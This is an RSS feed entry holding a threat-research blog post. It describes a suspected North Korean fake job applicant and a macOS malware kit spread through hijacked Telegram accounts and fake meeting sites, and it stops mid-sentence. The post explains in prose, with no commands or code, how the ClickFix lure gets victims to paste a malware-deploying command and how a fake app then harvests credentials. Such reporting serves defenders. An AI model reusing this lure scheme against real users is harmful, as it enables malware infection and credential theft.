<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"><channel><title><![CDATA[Bitso Quetzal Team]]></title><description><![CDATA[Web3 Threats Research Team]]></description><link>https://quetzal.bitso.com</link><image><url>https://substackcdn.com/image/fetch/$s_!cuQK!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F11872cb6-bf9c-458b-a66a-3f73cba0a756_1280x1280.png</url><title>Bitso Quetzal Team</title><link>https://quetzal.bitso.com</link></image><generator>Substack</generator><lastBuildDate>Wed, 22 Apr 2026 08:19:18 GMT</lastBuildDate><atom:link href="https://quetzal.bitso.com/feed" rel="self" type="application/rss+xml"/><copyright><![CDATA[Bitso]]></copyright><language><![CDATA[en]]></language><webMaster><![CDATA[quetzalteam@substack.com]]></webMaster><itunes:owner><itunes:email><![CDATA[quetzalteam@substack.com]]></itunes:email><itunes:name><![CDATA[Mauro Eldritch]]></itunes:name></itunes:owner><itunes:author><![CDATA[Mauro Eldritch]]></itunes:author><googleplay:owner><![CDATA[quetzalteam@substack.com]]></googleplay:owner><googleplay:email><![CDATA[quetzalteam@substack.com]]></googleplay:email><googleplay:author><![CDATA[Mauro Eldritch]]></googleplay:author><itunes:block><![CDATA[Yes]]></itunes:block><item><title><![CDATA[North Korea's Safari: Hunting for RATs]]></title><description><![CDATA[Introducing a new malware kit: Mach-O Man &#128110;&#127995;&#8205;&#9794;&#65039;&#128119;&#127995;&#8205;&#9794;&#65039;&#128104;&#127995;&#8205;&#127806;&#128104;&#127995;&#8205;&#9992;&#65039;&#128104;&#127995;&#8205;&#128658;]]></description><link>https://quetzal.bitso.com/p/north-koreas-safari-hunting-for-rats</link><guid isPermaLink="false">https://quetzal.bitso.com/p/north-koreas-safari-hunting-for-rats</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Mon, 13 Apr 2026 14:30:52 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/33c61882-6198-421c-a37d-95ddb0002af4_772x626.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>No, this article isn&#8217;t about a well-known American band, but rather a well-known <strong>North Korean boy band</strong>.</p><p>Today we&#8217;ll talk about two things: a rather <strong>funny interview</strong> we just had with a <strong>new</strong> <strong>Chollima</strong>, and a <strong>new malware kit</strong> we&#8217;ve identified in the wild that they&#8217;re currently spreading.</p><p>This time, it&#8217;s not a <strong><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/">Python</a></strong> or <strong><a href="https://any.run/cybersecurity-blog/ottercookie-malware-analysis/">JavaScript</a></strong> implant, but <strong>a dedicated macOS kit</strong>, featuring a couple of <strong><a href="https://en.wikipedia.org/wiki/Mach-O">Mach-O binaries</a></strong>.</p><p>So, for the lack of a better name, we&#8217;re calling this new kit <strong>Mach-O Man</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!W3PZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!W3PZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 424w, https://substackcdn.com/image/fetch/$s_!W3PZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 848w, https://substackcdn.com/image/fetch/$s_!W3PZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 1272w, https://substackcdn.com/image/fetch/$s_!W3PZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!W3PZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png" width="372" height="340.76335877862596" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1200,&quot;width&quot;:1310,&quot;resizeWidth&quot;:372,&quot;bytes&quot;:2297009,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!W3PZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 424w, https://substackcdn.com/image/fetch/$s_!W3PZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 848w, https://substackcdn.com/image/fetch/$s_!W3PZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 1272w, https://substackcdn.com/image/fetch/$s_!W3PZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F53ae6938-500e-4963-be0b-cf505b812f09_1310x1200.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Conceptual artist&#8217;s impression about Mach-O Men.</figcaption></figure></div><div><hr></div><h2>Old habits die hard</h2><p>You probably remember our previous encounters with <strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-vi">Famous</a></strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-vi"> </a><strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-vi">Chollima</a></strong> operatives. If not, here&#8217;s a recap:</p><p><strong>Famous</strong> <strong>Chollima</strong> is a division of the infamous <strong>Lazarus</strong> <strong>Group</strong>, a hacking group linked to the <strong>North</strong> <strong>Korean</strong> government.</p><p>They often target <strong>crypto</strong> <strong>exchanges</strong>, <strong>DeFi</strong> <strong>protocols</strong>, and <strong>financial</strong> <strong>companies</strong>, although they also expand into other sectors. In recent times, they&#8217;ve started <strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-v">infiltrating companies by applying for legitimate job openings</a></strong>. Once hired, they conduct <strong>corporate</strong> <strong>espionage</strong>, including <strong>information and financial theft</strong>, while their salaries help fund their sanctioned regime.</p><p>After our first encounter in 2025, we were <strong>the first company</strong> to <a href="https://quetzal.bitso.com/p/interview-with-the-chollima">publicly share our experience</a> with them, including <strong>full</strong> <strong>interview</strong> <strong>recordings</strong>, <strong>images</strong> <strong>of their faces</strong>, and <strong>indicators</strong> <strong>of</strong> <strong>compromise</strong>.</p><p>You can read <strong>all our encounters</strong> with them <a href="https://linktr.ee/quetzalteam">here</a>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ucpl!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ucpl!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 424w, https://substackcdn.com/image/fetch/$s_!Ucpl!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 848w, https://substackcdn.com/image/fetch/$s_!Ucpl!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 1272w, https://substackcdn.com/image/fetch/$s_!Ucpl!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ucpl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png" width="344" height="345.26937269372695" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1088,&quot;width&quot;:1084,&quot;resizeWidth&quot;:344,&quot;bytes&quot;:1624663,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Ucpl!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 424w, https://substackcdn.com/image/fetch/$s_!Ucpl!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 848w, https://substackcdn.com/image/fetch/$s_!Ucpl!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 1272w, https://substackcdn.com/image/fetch/$s_!Ucpl!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8d137114-3b8f-43da-84e0-e7e9976b03ad_1084x1088.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Famous Chollima operators who tried to apply for a job at Bitso. </figcaption></figure></div><p>While this may deter them for some time, time passes, and this year it <strong>happened</strong> <strong>again</strong>. Let&#8217;s take a look.</p><p>Our <strong>Talent Acquisition Specialist</strong>, and new member of our <strong>Quetzal Team</strong>, <strong>Sof&#237;a</strong>, has just received an application from <strong>a Colombian enginee</strong>r going by the name &#8220;Luis &#193;ngel&#8221;. This time it all seems (a little bit more) plausible.</p><p>But&#8230; old habits die hard, and you&#8217;ll soon see why.</p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;64e2a5ce-6268-4d04-b1c5-60014c36aaa8&quot;,&quot;duration&quot;:null}"></div><p>Despite his young age, subtly betrayed by a <em>not particularly</em> well-maintained chin, Luis claims to have <strong>over eight years of experience</strong> across<strong> a wide range of languages and frameworks</strong>.</p><p>After confirming that he is <strong>Colombian</strong>, he quickly <strong>backs away from conducting the interview in Spanish</strong>, claiming instead that he is actually from <strong>Singapore</strong> and has only recently arrived in the country. When asked once more to confirm, he mumbles an excuse, smiles nervously showing his teeth, and we promptly end the interview on our end.</p><p><strong><a href="https://quetzal.bitso.com/p/interview-with-the-chollima-iv">A Colombian who does not speak Spanish</a></strong>&#8230; as I said, <em>old habits die hard</em>.</p><p>Anyway, let&#8217;s not keep entertaining ourselves with their <em>greatest hits </em>over and over (which we know from memory), or we might miss their new album. </p><p>And I believe this one will be a success.</p><div><hr></div><h2>A new malware kit: Mach-O Man</h2><p>I once heard that you shouldn&#8217;t sleep on your fame, or it will eventually fade. This boy band seems to live by that rule, releasing new hits non-stop.</p><p>In the past, we&#8217;ve seen malware written in <strong><a href="https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/">Python</a></strong>, <strong><a href="https://quetzal.bitso.com/p/north-koreas-safari-poaching-for">JavaScript</a></strong> (<a href="https://any.run/cybersecurity-blog/ottercookie-malware-analysis/">more than once)</a>, and even <strong><a href="https://quetzal.bitso.com/p/north-koreas-safari-poaching-for-064">Go</a></strong>, sometimes original, sometimes<a href="https://any.run/cybersecurity-blog/pylangghost-malware-analysis/"> loosely ported to </a><strong><a href="https://any.run/cybersecurity-blog/pylangghost-malware-analysis/">Python</a></strong>. Now, however, we are facing something relatively new: <strong>compiled</strong> <strong>Mach-O</strong> (Mach Object) binaries for <strong>macOS</strong>, native to the platform. </p><p>The ruse starts with an old trick. They hijack the <strong>Telegram</strong> account of <strong>someone in the Web3 or crypto space</strong> and invite their contacts to a <strong>meeting</strong> on a website <strong>impersonating a legitimate platform</strong> like Teams, Meet, or Zoom. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!1B0u!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!1B0u!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 424w, https://substackcdn.com/image/fetch/$s_!1B0u!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 848w, https://substackcdn.com/image/fetch/$s_!1B0u!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 1272w, https://substackcdn.com/image/fetch/$s_!1B0u!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!1B0u!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png" width="317" height="463.39049235993207" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3305e48d-ab26-4cad-a665-778af88a3b2d_589x861.jpeg&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:861,&quot;width&quot;:589,&quot;resizeWidth&quot;:317,&quot;bytes&quot;:133985,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4d802042-d8c6-4d6c-874d-05a18945405e_589x1280.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!1B0u!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 424w, https://substackcdn.com/image/fetch/$s_!1B0u!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 848w, https://substackcdn.com/image/fetch/$s_!1B0u!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 1272w, https://substackcdn.com/image/fetch/$s_!1B0u!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F077fa2ef-0fbe-485a-b6b5-a7a2ae71d628_589x861.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Hijacked account from a legit company</figcaption></figure></div><p>Once there, the site <strong>simulates a failure</strong> and prompts the user to &#8220;<em>copy and paste a fix into their terminal</em>&#8221;. That &#8220;<em>fix</em>&#8221; is actually a command <strong>to deploy malware</strong>. This technique is known as <strong>ClickFix</strong>, and<a href="https://quetzal.bitso.com/p/north-koreas-safari-poaching-for-064"> we have covered it a couple of times in the past</a>.</p><p>Let&#8217;s take a closer look at what this kit does. The first step is a <strong>stager</strong>, a common piece of malware that <em>prepares</em> the ground for the full infection, in this case called <em>teamsSDK.bin</em>. The <strong>ClickFix</strong> command presented to the victim directly downloads and executes it.</p><p>It then communicates with its <strong>command-and-control server</strong> and downloads a <strong>fake application</strong> mimicking the platform the victim intended to visit, such as <strong>Zoom</strong>, <strong>Google</strong>, or <strong>Teams</strong>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!I03-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!I03-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 424w, https://substackcdn.com/image/fetch/$s_!I03-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 848w, https://substackcdn.com/image/fetch/$s_!I03-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 1272w, https://substackcdn.com/image/fetch/$s_!I03-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!I03-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png" width="1456" height="1004" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d68a78bc-cdae-49ae-a092-9b12a78556d2_2416x1666.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1004,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:5861558,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/193629851?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd68a78bc-cdae-49ae-a092-9b12a78556d2_2416x1666.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!I03-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 424w, https://substackcdn.com/image/fetch/$s_!I03-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 848w, https://substackcdn.com/image/fetch/$s_!I03-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 1272w, https://substackcdn.com/image/fetch/$s_!I03-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e43df68-d821-483d-98ac-c5abcf0fec40_2416x1666.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Fake App running in my lab instance</figcaption></figure></div><p>That application will then casually <strong>ask for your credentials</strong> in suspiciously broken 